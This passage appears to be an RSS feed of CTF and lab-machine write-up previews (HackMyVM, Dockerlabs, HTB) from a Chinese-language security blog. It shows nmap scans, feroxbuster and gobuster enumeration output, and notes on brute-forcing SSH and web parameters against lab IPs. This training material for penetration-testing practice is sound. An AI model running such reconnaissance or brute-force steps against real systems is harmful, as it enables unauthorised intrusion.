|_  256 6a:2b:e4:44:29:78:62:fb:61:0b:09:2f:9c:bc:18:c6 (ED25519)
80/tcp open  http    Apache httpd 2.4.62 ((Debian))
|_http-title: Apache2 Debian Default Page: It works
|_http-server-header: Apache/2.4.62 (Debian)
&lt;/code&gt;&lt;/pre&gt;&lt;h2 id=&#34;feroxbuster&#34;&gt;Feroxbuster&lt;/h2&gt;
&lt;pre tabindex=&#34;0&#34;&gt;&lt;code&gt;[root@kali] /home/kali  
❯ feroxbuster -u &amp;#39;http://192.168.55.11/&amp;#39; -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt  -x php
                                                                                                                                                
 ___  ___  __   __     __      __         __   ___
|__  |__  |__) |__) | /  `    /  \ \_/ | |  \ |__
|    |___ |  \ |  \ | \__,    \__/ / \ | |__/ |___
by Ben &amp;#34;epi&amp;#34; Risher 🤓                 ver: 2.11.0
───────────────────────────┬──────────────────────
 🎯  Target Url            │ http://192.168.55.11/
 🚀  Threads               │ 50
 📖  Wordlist              │ /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
 👌  Status Codes          │ All Status Codes!
 💥  Timeout (secs)        │ 7
 🦡  User-Agent            │ feroxbuster/2.11.0
 💉  Config File           │ /etc/feroxbuster/ferox-config.toml
 🔎  Extract Links         │ true
 💲  Extensions            │ [php]
 🏁  HTTP methods          │ [GET]
 🔃  Recursion Depth       │ 4
───────────────────────────┴──────────────────────
 🏁  Press [ENTER] to use the Scan Management Menu™
──────────────────────────────────────────────────
403      GET        9l       28w      278c Auto-filtering found 404-like response and created new filter; toggle off with --dont-filter
404      GET        9l       31w      275c Auto-filtering found 404-like response and created new filter; toggle off with --dont-filter
200      GET        0l        0w        0c http://192.168.55.11/contact.php
200      GET       25l      127w    10359c http://192.168.55.11/icons/openlogo-75.png
200      GET      368l      933w    10701c http://192.168.55.11/
[####################] - 19s   220551/220551  0s      found:3       errors:0      
[####################] - 18s   220546/220546  12201/s http://192.168.55.11/    
&lt;/code&gt;&lt;/pre&gt;&lt;p&gt;其中&lt;strong&gt;contact.php&lt;/strong&gt;并没有任何回显，尝试参数爆破&lt;/p&gt;</description>
    </item>
    <item>
      <title>HackMyVM-HackingToys</title>
      <link>https://www.hyhforever.top/posts/2025/04/hackmyvm-hackingtoys/</link>
      <pubDate>Mon, 21 Apr 2025 00:00:00 +0000</pubDate>
      <guid>https://www.hyhforever.top/posts/2025/04/hackmyvm-hackingtoys/</guid>
      <description>&lt;h2 id=&#34;box-info&#34;&gt;Box Info&lt;/h2&gt;
&lt;table&gt;
  &lt;thead&gt;
      &lt;tr&gt;
          &lt;th&gt;OS&lt;/th&gt;
          &lt;th&gt;Linux&lt;/th&gt;
      &lt;/tr&gt;
  &lt;/thead&gt;
  &lt;tbody&gt;
      &lt;tr&gt;
          &lt;td&gt;Difficulty&lt;/td&gt;
          &lt;td&gt;Medium&lt;/td&gt;
      &lt;/tr&gt;
  &lt;/tbody&gt;
&lt;/table&gt;
&lt;h2 id=&#34;nmap&#34;&gt;Nmap&lt;/h2&gt;
&lt;pre tabindex=&#34;0&#34;&gt;&lt;code&gt;[root@kali] /home/kali/hackingtoys  
❯ nmap 192.168.55.10 -sV -A -p-

PORT     STATE SERVICE  VERSION
22/tcp   open  ssh      OpenSSH 9.2p1 Debian 2+deb12u2 (protocol 2.0)
| ssh-hostkey: 
|   256 e7:ce:f2:f6:5d:a7:47:5a:16:2f:90:07:07:33:4e:a9 (ECDSA)
|_  256 09:db:b7:e8:ee:d4:52:b8:49:c3:cc:29:a5:6e:07:35 (ED25519)
3000/tcp open  ssl/ppp?
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: organizationName=Internet Widgits Pty Ltd/stateOrProvinceName=Some-State/countryName=FR
| Not valid before: 2024-05-20T15:36:20
|_Not valid after:  2038-01-27T15:36:20
| fingerprint-strings: 
|   GenericLines: 
|     HTTP/1.0 400 Bad Request
|     Content-Length: 930
|     Puma caught this error: Invalid HTTP format, parsing fails. Are you trying to open an SSL connection to a non-SSL Puma? (Puma::HttpParserError)
|     /usr/local/rvm/gems/ruby-3.1.0/gems/puma-6.4.2/lib/puma/client.rb:268:in `execute&amp;#39;
|     /usr/local/rvm/gems/ruby-3.1.0/gems/puma-6.4.2/lib/puma/client.rb:268:in `try_to_finish&amp;#39;
|     /usr/local/rvm/gems/ruby-3.1.0/gems/puma-6.4.2/lib/puma/server.rb:298:in `reactor_wakeup&amp;#39;
|     /usr/local/rvm/gems/ruby-3.1.0/gems/puma-6.4.2/lib/puma/server.rb:248:in `block in run&amp;#39;
|     /usr/local/rvm/gems/ruby-3.1.0/gems/puma-6.4.2/lib/puma/reactor.rb:119:in `wakeup!&amp;#39;
|     /usr/local/rvm/gems/ruby-3.1.0/gems/puma-6.4.2/lib/puma/reactor.rb:76:in `block in select_loop&amp;#39;
|     /usr/local/rvm/gems/ruby-3.1.0/gems/puma-6.4.2/lib/puma/reactor.rb:76:in `select&amp;#39;
|     /usr/local/rvm/gems/ruby-3.1.0/gems/puma-6.4.2/lib/puma/reactor.rb:76:in `select_loop&amp;#39;
|     /usr/loc
|   GetRequest: 
|     HTTP/1.0 403 Forbidden
|     content-type: text/html; charset=UTF-8
|     Content-Length: 5702
|     &amp;lt;!DOCTYPE html&amp;gt;
|     &amp;lt;html lang=&amp;#34;en&amp;#34;&amp;gt;
|     &amp;lt;head&amp;gt;
|     &amp;lt;meta charset=&amp;#34;utf-8&amp;#34; /&amp;gt;
|     &amp;lt;meta name=&amp;#34;viewport&amp;#34; content=&amp;#34;width=device-width, initial-scale=1&amp;#34;&amp;gt;
|     &amp;lt;meta name=&amp;#34;turbo-visit-control&amp;#34; content=&amp;#34;reload&amp;#34;&amp;gt;
|     &amp;lt;title&amp;gt;Action Controller: Exception caught&amp;lt;/title&amp;gt;
|     &amp;lt;style&amp;gt;
|     body {
|     background-color: #FAFAFA;
|     color: #333;
|     color-scheme: light dark;
|     supported-color-schemes: light dark;
|     margin: 0px;
|     body, p, ol, ul, td {
|     font-family: helvetica, verdana, arial, sans-serif;
|     font-size: 13px;
|     line-height: 18px;
|     font-size: 11px;
|     white-space: pre-wrap;
|     pre.box {
|     border: 1px solid #EEE;
|     padding: 10px;
|     margin: 0px;
|     width: 958px;
|     header {
|     color: #F0F0F0;
|     background: #C00;
|_    padding:
&lt;/code&gt;&lt;/pre&gt;&lt;p&gt;查看&lt;strong&gt;3000&lt;/strong&gt;端口服务，是&lt;strong&gt;Ruby on rails&lt;/strong&gt;&lt;/p&gt;</description>
    </item>
    <item>
      <title>HackMyVM-Pwned</title>
      <link>https://www.hyhforever.top/posts/2025/04/hackmyvm-pwned/</link>
      <pubDate>Sun, 20 Apr 2025 00:00:00 +0000</pubDate>
      <guid>https://www.hyhforever.top/posts/2025/04/hackmyvm-pwned/</guid>
      <description>&lt;h2 id=&#34;box-info&#34;&gt;Box Info&lt;/h2&gt;
&lt;table&gt;
  &lt;thead&gt;
      &lt;tr&gt;
          &lt;th&gt;OS&lt;/th&gt;
          &lt;th&gt;Linux&lt;/th&gt;
      &lt;/tr&gt;
  &lt;/thead&gt;
  &lt;tbody&gt;
      &lt;tr&gt;
          &lt;td&gt;Difficulty&lt;/td&gt;
          &lt;td&gt;Easy&lt;/td&gt;
      &lt;/tr&gt;
  &lt;/tbody&gt;
&lt;/table&gt;
&lt;h2 id=&#34;nmap&#34;&gt;Nmap&lt;/h2&gt;
&lt;pre tabindex=&#34;0&#34;&gt;&lt;code&gt;[root@kali] /home/kali  
❯ nmap 192.168.56.158 -sV -A -p- 

PORT   STATE SERVICE VERSION
21/tcp open  ftp     vsftpd 3.0.3
22/tcp open  ssh     OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey: 
|   2048 fe:cd:90:19:74:91:ae:f5:64:a8:a5:e8:6f:6e:ef:7e (RSA)
|   256 81:32:93:bd:ed:9b:e7:98:af:25:06:79:5f:de:91:5d (ECDSA)
|_  256 dd:72:74:5d:4d:2d:a3:62:3e:81:af:09:51:e0:14:4a (ED25519)
80/tcp open  http    Apache httpd 2.4.38 ((Debian))
|_http-server-header: Apache/2.4.38 (Debian)
|_http-title: Pwned....!!
&lt;/code&gt;&lt;/pre&gt;&lt;h2 id=&#34;feroxbuster&#34;&gt;Feroxbuster&lt;/h2&gt;
&lt;pre tabindex=&#34;0&#34;&gt;&lt;code&gt;[root@kali] /home/kali/pwned  
❯ feroxbuster -u http://192.168.55.6/ -w /usr/share/seclists/Discovery/Web-Content/directory-list-lowercase-2.3-big.txt -x php,txt
                                                                                                                             
 ___  ___  __   __     __      __         __   ___
|__  |__  |__) |__) | /  `    /  \ \_/ | |  \ |__
|    |___ |  \ |  \ | \__,    \__/ / \ | |__/ |___
by Ben &amp;#34;epi&amp;#34; Risher 🤓                 ver: 2.11.0
───────────────────────────┬──────────────────────
 🎯  Target Url            │ http://192.168.55.6/
 🚀  Threads               │ 50
 📖  Wordlist              │ /usr/share/seclists/Discovery/Web-Content/directory-list-lowercase-2.3-big.txt
 👌  Status Codes          │ All Status Codes!
 💥  Timeout (secs)        │ 7
 🦡  User-Agent            │ feroxbuster/2.11.0
 💉  Config File           │ /etc/feroxbuster/ferox-config.toml
 🔎  Extract Links         │ true
 💲  Extensions            │ [php, txt]
 🏁  HTTP methods          │ [GET]
 🔃  Recursion Depth       │ 4
───────────────────────────┴──────────────────────
 🏁  Press [ENTER] to use the Scan Management Menu™
──────────────────────────────────────────────────
404      GET        9l       31w      274c Auto-filtering found 404-like response and created new filter; toggle off with --dont-filter                                                                                                                   
403      GET        9l       28w      277c Auto-filtering found 404-like response and created new filter; toggle off with --dont-filter                                                                                                                   
200      GET       16l       27w      194c http://192.168.55.6/nothing/nothing.html
200      GET       75l      191w     3065c http://192.168.55.6/
200      GET        4l        7w       41c http://192.168.55.6/robots.txt
301      GET        9l       28w      314c http://192.168.55.6/nothing =&amp;gt; http://192.168.55.6/nothing/
301      GET        9l       28w      318c http://192.168.55.6/hidden_text =&amp;gt; http://192.168.55.6/hidden_text/
200      GET       22l       21w      211c http://192.168.55.6/hidden_text/secret.dic
&lt;/code&gt;&lt;/pre&gt;&lt;p&gt;下载这个&lt;strong&gt;dic&lt;/strong&gt;用作扫描字典&lt;/p&gt;</description>
    </item>
    <item>
      <title>HackMyVM-Gift</title>
      <link>https://www.hyhforever.top/posts/2025/04/hackmyvm-gift/</link>
      <pubDate>Sat, 19 Apr 2025 00:00:00 +0000</pubDate>
      <guid>https://www.hyhforever.top/posts/2025/04/hackmyvm-gift/</guid>
      <description>&lt;h2 id=&#34;box-info&#34;&gt;Box Info&lt;/h2&gt;
&lt;table&gt;
  &lt;thead&gt;
      &lt;tr&gt;
          &lt;th&gt;OS&lt;/th&gt;
          &lt;th&gt;Linux&lt;/th&gt;
      &lt;/tr&gt;
  &lt;/thead&gt;
  &lt;tbody&gt;
      &lt;tr&gt;
          &lt;td&gt;Difficulty&lt;/td&gt;
          &lt;td&gt;Easy&lt;/td&gt;
      &lt;/tr&gt;
  &lt;/tbody&gt;
&lt;/table&gt;
&lt;h2 id=&#34;nmap&#34;&gt;Nmap&lt;/h2&gt;
&lt;pre tabindex=&#34;0&#34;&gt;&lt;code&gt;[root@kali] /home/kali  
❯ nmap 192.168.56.157 -sV -A -p- 

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.3 (protocol 2.0)
| ssh-hostkey: 
|   3072 2c:1b:36:27:e5:4c:52:7b:3e:10:94:41:39:ef:b2:95 (RSA)
|   256 93:c1:1e:32:24:0e:34:d9:02:0e:ff:c3:9c:59:9b:dd (ECDSA)
|_  256 81:ab:36:ec:b1:2b:5c:d2:86:55:12:0c:51:00:27:d7 (ED25519)
80/tcp open  http    nginx
|_http-title: Site doesn&amp;#39;t have a title (text/html).
&lt;/code&gt;&lt;/pre&gt;&lt;p&gt;目录扫描失败&lt;/p&gt;
&lt;pre tabindex=&#34;0&#34;&gt;&lt;code&gt;[root@kali] /home/kali  
❯ curl &amp;#34;http://192.168.56.157/&amp;#34; -v  
*   Trying 192.168.56.157:80...
* Connected to 192.168.56.157 (192.168.56.157) port 80
* using HTTP/1.x
&amp;gt; GET / HTTP/1.1
&amp;gt; Host: 192.168.56.157
&amp;gt; User-Agent: curl/8.12.1
&amp;gt; Accept: */*
&amp;gt; 
* Request completely sent off
&amp;lt; HTTP/1.1 200 OK
&amp;lt; Server: nginx
&amp;lt; Date: Sat, 19 Apr 2025 06:42:57 GMT
&amp;lt; Content-Type: text/html
&amp;lt; Content-Length: 57
&amp;lt; Last-Modified: Sun, 20 Sep 2020 16:29:39 GMT
&amp;lt; Connection: keep-alive
&amp;lt; ETag: &amp;#34;5f678373-39&amp;#34;
&amp;lt; Accept-Ranges: bytes
&amp;lt; 

Dont Overthink. Really, Its simple.
        &amp;lt;!-- Trust me --&amp;gt;

* Connection #0 to host 192.168.56.157 left intact
&lt;/code&gt;&lt;/pre&gt;&lt;h2 id=&#34;hydra-to-ssh&#34;&gt;Hydra to ssh&lt;/h2&gt;
&lt;p&gt;尝试使用&lt;strong&gt;simple&lt;/strong&gt;爆破登录&lt;/p&gt;</description>
    </item>
    <item>
      <title>VulnVM-easyaspie</title>
      <link>https://www.hyhforever.top/posts/2025/04/vulnvm-easyaspie/</link>
      <pubDate>Sat, 19 Apr 2025 00:00:00 +0000</pubDate>
      <guid>https://www.hyhforever.top/posts/2025/04/vulnvm-easyaspie/</guid>
      <description>&lt;h2 id=&#34;box-info&#34;&gt;Box Info&lt;/h2&gt;
&lt;table&gt;
  &lt;thead&gt;
      &lt;tr&gt;
          &lt;th&gt;OS&lt;/th&gt;
          &lt;th&gt;Linux&lt;/th&gt;
      &lt;/tr&gt;
  &lt;/thead&gt;
  &lt;tbody&gt;
      &lt;tr&gt;
          &lt;td&gt;Difficulty&lt;/td&gt;
          &lt;td&gt;Easy&lt;/td&gt;
      &lt;/tr&gt;
  &lt;/tbody&gt;
&lt;/table&gt;
&lt;h2 id=&#34;nmap&#34;&gt;Nmap&lt;/h2&gt;
&lt;pre tabindex=&#34;0&#34;&gt;&lt;code&gt;[root@kali] /home/kali/homelab  
❯ nmap 192.168.56.156 -sV -A -p-

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.11 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 8c:c5:70:a6:8f:7c:53:6f:98:6d:01:9c:63:b7:3b:60 (RSA)
|   256 31:1f:74:73:32:ff:8e:f0:f9:63:fb:51:13:98:32:27 (ECDSA)
|_  256 7e:1f:ea:1b:50:38:d8:88:5a:fc:cb:6f:70:3f:25:0b (ED25519)
80/tcp open  http    Apache httpd 2.4.41 ((Ubuntu))
|_http-title: Apache2 Ubuntu Default Page: It works
|_http-server-header: Apache/2.4.41 (Ubuntu)
&lt;/code&gt;&lt;/pre&gt;&lt;h2 id=&#34;gobuster&#34;&gt;Gobuster&lt;/h2&gt;
&lt;pre tabindex=&#34;0&#34;&gt;&lt;code&gt;[root@kali] /home/kali/homelab  
❯ gobuster dir -u http://192.168.56.156/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt  -x php,txt -t 50                    
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) &amp;amp; Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.56.156/
[+] Method:                  GET
[+] Threads:                 50
[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.6
[+] Extensions:              php,txt
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/note.txt             (Status: 200) [Size: 162]
/server-status        (Status: 403) [Size: 279]
Progress: 661680 / 661683 (100.00%)
===============================================================
&lt;/code&gt;&lt;/pre&gt;&lt;p&gt;查看**/note.txt**&lt;/p&gt;</description>
    </item>
    <item>
      <title>Dockerlabs-stackinferno</title>
      <link>https://www.hyhforever.top/posts/2025/04/dockerlabs-stackinferno/</link>
      <pubDate>Thu, 17 Apr 2025 00:00:00 +0000</pubDate>
      <guid>https://www.hyhforever.top/posts/2025/04/dockerlabs-stackinferno/</guid>
      <description>&lt;h2 id=&#34;box-info&#34;&gt;Box Info&lt;/h2&gt;
&lt;table&gt;
  &lt;thead&gt;
      &lt;tr&gt;
          &lt;th&gt;OS&lt;/th&gt;
          &lt;th&gt;Linux&lt;/th&gt;
      &lt;/tr&gt;
  &lt;/thead&gt;
  &lt;tbody&gt;
      &lt;tr&gt;
          &lt;td&gt;Difficulty&lt;/td&gt;
          &lt;td&gt;Medium&lt;/td&gt;
      &lt;/tr&gt;
  &lt;/tbody&gt;
&lt;/table&gt;
&lt;p&gt;提权部分为非预期&lt;/p&gt;
&lt;h2 id=&#34;nmap&#34;&gt;Nmap&lt;/h2&gt;
&lt;pre tabindex=&#34;0&#34;&gt;&lt;code&gt;[root@kali] /home/kali/stackinferno  
❯ nmap 172.17.0.2 -sV -A -p-

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 9.2p1 Debian 2+deb12u5 (protocol 2.0)
| ssh-hostkey: 
|   256 88:00:5f:26:eb:50:e4:55:6d:0a:0c:73:58:99:cd:2d (ECDSA)
|_  256 6b:36:5c:a3:c0:8b:22:b7:35:11:86:f1:7e:7f:77:5b (ED25519)
80/tcp open  http    Werkzeug/2.2.2 Python/3.11.2
|_http-server-header: Werkzeug/2.2.2 Python/3.11.2
| fingerprint-strings: 
|   FourOhFourRequest: 
|     HTTP/1.1 302 FOUND
|     Server: Werkzeug/2.2.2 Python/3.11.2
|     Date: Wed, 16 Apr 2025 03:01:23 GMT
|     Content-Type: text/html; charset=utf-8
|     Content-Length: 223
|     Location: http://cybersec.dl
|     Connection: close
|     &amp;lt;!doctype html&amp;gt;
|     &amp;lt;html lang=en&amp;gt;
|     &amp;lt;title&amp;gt;Redirecting...&amp;lt;/title&amp;gt;
|     &amp;lt;h1&amp;gt;Redirecting...&amp;lt;/h1&amp;gt;
|     &amp;lt;p&amp;gt;You should be redirected automatically to the target URL: &amp;lt;a href=&amp;#34;http://cybersec.dl&amp;#34;&amp;gt;http://cybersec.dl&amp;lt;/a&amp;gt;. If not, click the link.
|   GetRequest, HTTPOptions: 
|     HTTP/1.1 302 FOUND
|     Server: Werkzeug/2.2.2 Python/3.11.2
|     Date: Wed, 16 Apr 2025 03:01:18 GMT
|     Content-Type: text/html; charset=utf-8
|     Content-Length: 223
|     Location: http://cybersec.dl
|     Connection: close
|     &amp;lt;!doctype html&amp;gt;
|     &amp;lt;html lang=en&amp;gt;
|     &amp;lt;title&amp;gt;Redirecting...&amp;lt;/title&amp;gt;
|     &amp;lt;h1&amp;gt;Redirecting...&amp;lt;/h1&amp;gt;
|     &amp;lt;p&amp;gt;You should be redirected automatically to the target URL: &amp;lt;a href=&amp;#34;http://cybersec.dl&amp;#34;&amp;gt;http://cybersec.dl&amp;lt;/a&amp;gt;. If not, click the link.
|   RTSPRequest: 
|     &amp;lt;!DOCTYPE HTML&amp;gt;
|     &amp;lt;html lang=&amp;#34;en&amp;#34;&amp;gt;
|     &amp;lt;head&amp;gt;
|     &amp;lt;meta charset=&amp;#34;utf-8&amp;#34;&amp;gt;
|     &amp;lt;title&amp;gt;Error response&amp;lt;/title&amp;gt;
|     &amp;lt;/head&amp;gt;
|     &amp;lt;body&amp;gt;
|     &amp;lt;h1&amp;gt;Error response&amp;lt;/h1&amp;gt;
|     &amp;lt;p&amp;gt;Error code: 400&amp;lt;/p&amp;gt;
|     &amp;lt;p&amp;gt;Message: Bad request version (&amp;#39;RTSP/1.0&amp;#39;).&amp;lt;/p&amp;gt;
|     &amp;lt;p&amp;gt;Error code explanation: 400 - Bad request syntax or unsupported method.&amp;lt;/p&amp;gt;
|     &amp;lt;/body&amp;gt;
|_    &amp;lt;/html&amp;gt;
|_http-title: CyberSec Corp - Expertos en Ciberseguridad
&lt;/code&gt;&lt;/pre&gt;&lt;p&gt;添加域名：&lt;strong&gt;cybersec.dl&lt;/strong&gt;&lt;/p&gt;</description>
    </item>
    <item>
      <title>HackMyVM-buster</title>
      <link>https://www.hyhforever.top/posts/2025/04/hackmyvm-buster/</link>
      <pubDate>Thu, 17 Apr 2025 00:00:00 +0000</pubDate>
      <guid>https://www.hyhforever.top/posts/2025/04/hackmyvm-buster/</guid>
      <description>&lt;h2 id=&#34;box-info&#34;&gt;Box Info&lt;/h2&gt;
&lt;table&gt;
  &lt;thead&gt;
      &lt;tr&gt;
          &lt;th&gt;OS&lt;/th&gt;
          &lt;th&gt;Linux&lt;/th&gt;
      &lt;/tr&gt;
  &lt;/thead&gt;
  &lt;tbody&gt;
      &lt;tr&gt;
          &lt;td&gt;Difficulty&lt;/td&gt;
          &lt;td&gt;Easy&lt;/td&gt;
      &lt;/tr&gt;
  &lt;/tbody&gt;
&lt;/table&gt;
&lt;h2 id=&#34;nmap&#34;&gt;Nmap&lt;/h2&gt;
&lt;pre tabindex=&#34;0&#34;&gt;&lt;code&gt;[root@kali] /home/kali  
❯ nmap 192.168.56.151 -sV -A                                                                                                                              

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.9p1 Debian 10+deb10u4 (protocol 2.0)
| ssh-hostkey: 
|   2048 c2:91:d9:a5:f7:a3:98:1f:c1:4a:70:28:aa:ba:a4:10 (RSA)
|   256 3e:1f:c9:eb:c0:6f:24:06:fc:52:5f:2f:1b:35:33:ec (ECDSA)
|_  256 ec:64:87:04:9a:4b:32:fe:2d:1f:9a:b0:81:d3:7c:cf (ED25519)
80/tcp open  http    nginx 1.14.2
| http-robots.txt: 1 disallowed entry 
|_/wp-admin/
|_http-server-header: nginx/1.14.2
|_http-generator: WordPress 6.7.1
|_http-title: bammmmuwe
&lt;/code&gt;&lt;/pre&gt;&lt;p&gt;直接就扫到了&lt;strong&gt;wordpress&lt;/strong&gt;目录&lt;/p&gt;</description>
    </item>
    <item>
      <title>Dockerlabs-ChocoPing</title>
      <link>https://www.hyhforever.top/posts/2025/04/dockerlabs-chocoping/</link>
      <pubDate>Tue, 15 Apr 2025 00:00:00 +0000</pubDate>
      <guid>https://www.hyhforever.top/posts/2025/04/dockerlabs-chocoping/</guid>
      <description>&lt;h2 id=&#34;box-info&#34;&gt;Box Info&lt;/h2&gt;
&lt;table&gt;
  &lt;thead&gt;
      &lt;tr&gt;
          &lt;th&gt;OS&lt;/th&gt;
          &lt;th&gt;Linux&lt;/th&gt;
      &lt;/tr&gt;
  &lt;/thead&gt;
  &lt;tbody&gt;
      &lt;tr&gt;
          &lt;td&gt;Difficulty&lt;/td&gt;
          &lt;td&gt;Medium&lt;/td&gt;
      &lt;/tr&gt;
  &lt;/tbody&gt;
&lt;/table&gt;
&lt;h2 id=&#34;nmap&#34;&gt;Nmap&lt;/h2&gt;
&lt;pre tabindex=&#34;0&#34;&gt;&lt;code&gt;[root@kali] /home/kali/Chocoping  
❯ nmap 172.17.0.2 -sV -A -p- 

PORT   STATE SERVICE VERSION
80/tcp open  http    Apache httpd 2.4.62
|_http-title: Index of /
|_http-server-header: Apache/2.4.62 (Debian)
| http-ls: Volume /
| SIZE  TIME              FILENAME
| 1.0K  2025-04-05 11:13  ping.php
&lt;/code&gt;&lt;/pre&gt;&lt;h2 id=&#34;own-www-data&#34;&gt;Own www-data&lt;/h2&gt;
&lt;p&gt;注意到可以传入&lt;strong&gt;ip&lt;/strong&gt;参数执行&lt;strong&gt;ping&lt;/strong&gt;命令&lt;/p&gt;
&lt;p&gt;&lt;a data-fancybox=&#34;gallery&#34; href=&#34;https://www.hyhforever.top/posts/2025/04/dockerlabs-chocoping/images/image-77.png&#34; data-caption=&#34;&#34;&gt;
&lt;img loading=&#34;lazy&#34; src=&#34;https://www.hyhforever.top/posts/2025/04/dockerlabs-chocoping/images/image-77.png&#34;&gt;
&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;下面我会用两种扫描工具来进行对比&lt;/p&gt;</description>
    </item>
    <item>
      <title>HTB-Nocturnal</title>
      <link>https://www.hyhforever.top/posts/2025/04/htb-nocturnal/</link>
      <pubDate>Mon, 14 Apr 2025 00:00:00 +0000</pubDate>
      <guid>https://www.hyhforever.top/posts/2025/04/htb-nocturnal/</guid>
      <description>&lt;h2 id=&#34;box-info&#34;&gt;Box Info&lt;/h2&gt;
&lt;table&gt;
  &lt;thead&gt;
      &lt;tr&gt;
          &lt;th&gt;OS&lt;/th&gt;
          &lt;th&gt;Linux&lt;/th&gt;
      &lt;/tr&gt;
  &lt;/thead&gt;
  &lt;tbody&gt;
      &lt;tr&gt;
          &lt;td&gt;Difficulty&lt;/td&gt;
          &lt;td&gt;Easy&lt;/td&gt;
      &lt;/tr&gt;
  &lt;/tbody&gt;
&lt;/table&gt;
&lt;h2 id=&#34;nmap&#34;&gt;Nmap&lt;/h2&gt;
&lt;pre tabindex=&#34;0&#34;&gt;&lt;code&gt;[root@kali] /home/kali/Nocturnal  
❯ nmap Nocturnal.htb -sV -A      

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.12 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 20:26:88:70:08:51:ee:de:3a:a6:20:41:87:96:25:17 (RSA)
|   256 4f:80:05:33:a6:d4:22:64:e9:ed:14:e3:12:bc:96:f1 (ECDSA)
|_  256 d9:88:1f:68:43:8e:d4:2a:52:fc:f0:66:d4:b9:ee:6b (ED25519)
80/tcp open  http    nginx 1.18.0 (Ubuntu)
| http-cookie-flags: 
|   /: 
|     PHPSESSID: 
|_      httponly flag not set
|_http-title: Welcome to Nocturnal
|_http-server-header: nginx/1.18.0 (Ubuntu)
&lt;/code&gt;&lt;/pre&gt;&lt;h2 id=&#34;user&#34;&gt;User&lt;/h2&gt;
&lt;p&gt;任意注册一个账户，然后登录，可以上传一些文件&lt;/p&gt;</description>
    </item>
    <item>
      <title>HackMyVM-jan</title>
      <link>https://www.hyhforever.top/posts/2025/04/hackmyvm-jan/</link>
      <pubDate>Wed, 09 Apr 2025 00:00:00 +0000</pubDate>
      <guid>https://www.hyhforever.top/posts/2025/04/hackmyvm-jan/</guid>
      <description>&lt;h2 id=&#34;box-info&#34;&gt;Box Info&lt;/h2&gt;
&lt;table&gt;
  &lt;thead&gt;
      &lt;tr&gt;
          &lt;th&gt;OS&lt;/th&gt;
          &lt;th&gt;Linux&lt;/th&gt;
      &lt;/tr&gt;
  &lt;/thead&gt;
  &lt;tbody&gt;
      &lt;tr&gt;
          &lt;td&gt;Difficulty&lt;/td&gt;
          &lt;td&gt;Easy&lt;/td&gt;
      &lt;/tr&gt;
  &lt;/tbody&gt;
&lt;/table&gt;
&lt;h2 id=&#34;nmap&#34;&gt;Nmap&lt;/h2&gt;
&lt;pre tabindex=&#34;0&#34;&gt;&lt;code&gt;[root@kali] /home/kali  
❯ nmap 192.168.56.144  -p-

PORT     STATE SERVICE
22/tcp   open  ssh
8080/tcp open  http-proxy
&lt;/code&gt;&lt;/pre&gt;&lt;h2 id=&#34;gobuster&#34;&gt;Gobuster&lt;/h2&gt;
&lt;pre tabindex=&#34;0&#34;&gt;&lt;code&gt;[root@kali] /home/kali  
❯ gobuster dir -u http://192.168.56.144:8080/ -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -x php,html,txt --exclude-length 45
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) &amp;amp; Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.56.144:8080/
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] Exclude Length:          45
[+] User Agent:              gobuster/3.6
[+] Extensions:              php,html,txt
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/redirect             (Status: 400) [Size: 24]
/robots.txt           (Status: 200) [Size: 16]
Progress: 97322 / 882244 (11.03%)^C
[!] Keyboard interrupt detected, terminating.
Progress: 100724 / 882244 (11.42%)
===============================================================
Finished
===============================================================
&lt;/code&gt;&lt;/pre&gt;&lt;p&gt;发现一个**/redirect&lt;strong&gt;路由，并且需要&lt;/strong&gt;url**参数&lt;/p&gt;</description>
    </item>
    <item>
      <title>Dockerlabs-WalkingDead</title>
      <link>https://www.hyhforever.top/posts/2025/04/dockerlabs-walkingdead/</link>
      <pubDate>Tue, 08 Apr 2025 00:00:00 +0000</pubDate>
      <guid>https://www.hyhforever.top/posts/2025/04/dockerlabs-walkingdead/</guid>
      <description>&lt;p&gt;《The Walking Dead》又叫做《行尸走肉》，是一部更了十多年的美剧，我是全部看完了的，刚好有这个靶机，那么肯定得打一下。&lt;/p&gt;
&lt;h2 id=&#34;box-info&#34;&gt;Box Info&lt;/h2&gt;
&lt;table&gt;
  &lt;thead&gt;
      &lt;tr&gt;
          &lt;th&gt;OS&lt;/th&gt;
          &lt;th&gt;Linux&lt;/th&gt;
      &lt;/tr&gt;
  &lt;/thead&gt;
  &lt;tbody&gt;
      &lt;tr&gt;
          &lt;td&gt;Difficulty&lt;/td&gt;
          &lt;td&gt;Easy&lt;/td&gt;
      &lt;/tr&gt;
  &lt;/tbody&gt;
&lt;/table&gt;
&lt;h2 id=&#34;nmap&#34;&gt;Nmap&lt;/h2&gt;
&lt;pre tabindex=&#34;0&#34;&gt;&lt;code&gt;[root@kali] /home/kali  
❯ nmap 172.17.0.2 -sV -A -p- 

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.11 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
